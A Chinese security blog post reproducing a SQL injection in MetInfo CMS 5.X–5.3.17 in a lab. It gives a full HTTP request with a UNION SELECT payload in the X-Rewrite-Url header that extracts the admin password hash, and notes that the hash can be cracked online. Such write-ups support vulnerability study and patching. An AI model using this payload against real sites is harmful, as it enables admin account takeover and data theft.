www.xiahuhu.cn
关注网络安全

MetInfo SQL注入漏洞

MetInfo

MetInfo是一套开源的建站CMS,是使用PHP语言加上MySQL数据库所开发的软件系统,可以在Linux、 Windows、MacOSX等各种不同的平台上执行。

 

漏洞简介及危害

MetInfo于8月1日发布了5.3.18的升级公告,此次修复了5.X到5.3.17版本的SQL注入漏洞,影响范围广泛。

成功访问后恶意访问者可以获取到管理员账号还有hash值

 

影响版本

MetInfo 5.X – 5.3.17

 

漏洞证明

0x00 环境搭建

地址:

首页地址:http://172.19.18.8/MetInfo-5.3.17/

后台地址:http://172.19.18.8/MetInfo-5.3.17/admin

漏洞前提:伪静态化需为开启状态


 

0x01漏洞证

http://172.16.12.2/metinfo/index.php?lang=Cn&index=0000进行抓包,会自动跳转至

/metinfo/list-Cn.html (如果没有自动跳转,点击Forward按钮即可)我们把抓到的包点击右键,发送到重放。Repeater

 

修改数据包,

X-Rewrite-Url处添加我们构造好的SQL语句。

 

 

GET /MetInfo-5.3.17/index.php?lang=Cn&index=0000 HTTP/1.1

Host: 172.19.18.8

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0

Accept: */*

Accept-Language: en

X-Rewrite-Url: 1/2/404xxx' union select 1,2,3,admin_pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from met_5_3_17admin_table limit 1#/index.php

Connection: close

Upgrade-Insecure-Requests: 1

 

 

 

 

 

我们点击Go按钮进行重放访问,可以看到页面中返回了我们查询的管理员的hash值。直接可以使用cmd5解密获取admin密码。

赞(1) 打赏
未经允许不得转载:花生米's Blog » MetInfo SQL注入漏洞
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏